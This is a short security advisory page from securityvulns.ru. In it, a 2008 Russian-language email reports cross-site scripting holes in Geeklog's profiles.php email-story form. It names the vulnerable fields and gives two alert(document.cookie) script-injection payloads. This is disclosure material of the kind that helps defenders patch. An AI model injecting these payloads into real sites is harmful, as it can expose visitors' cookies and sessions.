Computer Security

Security Advisory: Cross-Site Scripting vulnerabilities in Geeklog
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  sysHotel On Line Remote File Disclosure Vulnerability.

  Million Dollar Script 2.0.14 Remote File Disclosure Vulnerability.

  SocialURL Login Page Cross-Site Scripting

  OneCMS Vulnerabilities

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:08.01.2008
Subject:Cross-Site Scripting vulnerabilities in Geeklog

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в движке Geeklog.

XSS:

POST запрос на http://site/profiles.php?sid=1&what=emailstory:

"><script>alert(document.cookie)</script>
В полях: Отправитель, Адрес отправителя, Получатель, Адрес получателя.

</textarea><script>alert(document.cookie)</script>
В поле: Короткое сообщение.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1708/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru